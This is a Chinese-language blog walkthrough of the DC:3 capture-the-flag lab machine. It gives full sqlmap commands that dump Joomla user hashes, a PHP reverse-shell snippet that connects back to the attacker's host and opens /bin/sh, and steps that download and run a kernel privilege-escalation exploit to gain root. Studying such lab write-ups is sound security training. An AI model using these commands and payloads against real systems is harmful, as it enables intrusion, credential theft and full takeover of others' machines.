DC系列 DC:3

抠脚大汉在网络

于 2023-11-02 23:13:16 发布

阅读量87

点赞数

分类专栏：渗透靶机文章标签： DC系列靶机渗透

本文链接：https://blog.csdn.net/weixin_70137901/article/details/134190217

版权

渗透同时被 2 个专栏收录

20 篇文章 0 订阅

订阅专栏

靶机

7 篇文章 0 订阅

订阅专栏

DC系列 DC:3

文章目录

DC系列 DC:3

调试靶机

点击虚拟机设置选择CD/DVD点击高级将IDE调成画面中这个选项
在这里插入图片描述

信息收集

IP端口信息收集

对自己网段进行扫描快速锁定ip
arp-scan 10.4.7.0/24
在这里插入图片描述
nmap -A 10.4.7.22对端口服务进行详细扫描

可以看到目标机开放着http服务框架为joomla

框架漏洞利用

joomscan扫描工具利用

用joomscan对改目标机进行扫描
joomscan -u http://10.4.7.22 --ec
在这里插入图片描述

msf工具利用(无法使用)

用msf查找版本漏洞
在这里插入图片描述
使用漏洞并使用php/meterpreter/reverse_tcp攻击载荷

添加攻击地址进行攻击发现没用连不上

kali漏洞库利用

在kali的漏洞库里进行搜索漏洞
searchsploit oomla 3.7.0
在这里插入图片描述
发现该版本是存在sql注入漏洞的我们查看该文件

locate php/webapps/42033.txt获取文件绝对路径
cat /usr/share/exploitdb/exploits/php/webapps/42033.txt查看文件

sqlmap利用

给我们提供了该框架sql注入的地址和sqlmap语句我们直接跑
sqlmap -u "http://10.4.7.22/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs
在这里插入图片描述
可能时间会有点长最后跑出5个库

我们继续跑查看joomladb库里有什么

sqlmap -u "http://10.4.7.22/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml"  -D "joomladb" --tables

在这里插入图片描述
跑出来user表我们继续跑里面的字段

sqlmap -u "http://10.4.7.22/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml"  -D "joomladb" -T "#__users" --column

在这里插入图片描述
跑出来很多字段我们重点关注username和password

我们跑出来看看

sqlmap -u "http://10.4.7.22/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml"  -D "joomladb" -T "#__users" -C "username,password" --dump

得到了账号密码但密码时加密的
在这里插入图片描述
我们用将密钥保存到文档里用john进行解密

得到密码snooy我们去joomla进行登录
这个页面joomscan扫到的

用账号密码进行登录

登录成功

文件上传

在extcnsions里选择templates中的templates里选择第二个(已经试过第一个了没反应)
在这里插入图片描述
找到index.php

上传小马

$sock = fsockopen("10.4.7.3", "10002");

$descriptorspec = array(

        0 => $sock,

        1 => $sock,

        2 => $sock

);

$process = proc_open('/bin/sh', $descriptorspec, $pipes);

proc_close($process);

点击保存
在这里插入图片描述
kali开启nc nc -lvvp 10002

访问index.php页面http://10.4.7.22/index.php
在这里插入图片描述
反弹成功

提权

进来之后先加一层壳python -c "import pty;pty.spawn('/bin/bash')"
在这里插入图片描述
查询系统版本cat /etc/*release

发现版本是Ubuntu 16.04去kali漏洞库里进行搜索searchsploit Ubuntu 16.04

下载下来查看searchsploit -m 39772.txt

查看文本文件 cat 39772.txt

发现该文件给了我们要使用的文件方法并且跟我们说使用完60秒内就会变为root权限并且给了我们下载地址
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip我们进行下载
在这里插入图片描述
下载完成我进行了解压传入了kali

在里面找到exploit.tar文件并在当前目录开启http服务传入目标机python -m http.server 80

在shell里cd 到tmp目录下用wget命令传入靶机http://10.4.7.3/exploit.tar

用tar命令进行解压tar xvf exploit.tar
在这里插入图片描述
cd到解压好的文件夹里对脚本文件进行赋权777 chmod 777 compile.sh chmod 777 doubleput.c

执行两个脚本文件
第一个执行时可能会报错但是没事进行执行第二个就好
/compile.sh

./doubleput

执行完成等待一会就成为root了
cd到root下拿下旗帜
在这里插入图片描述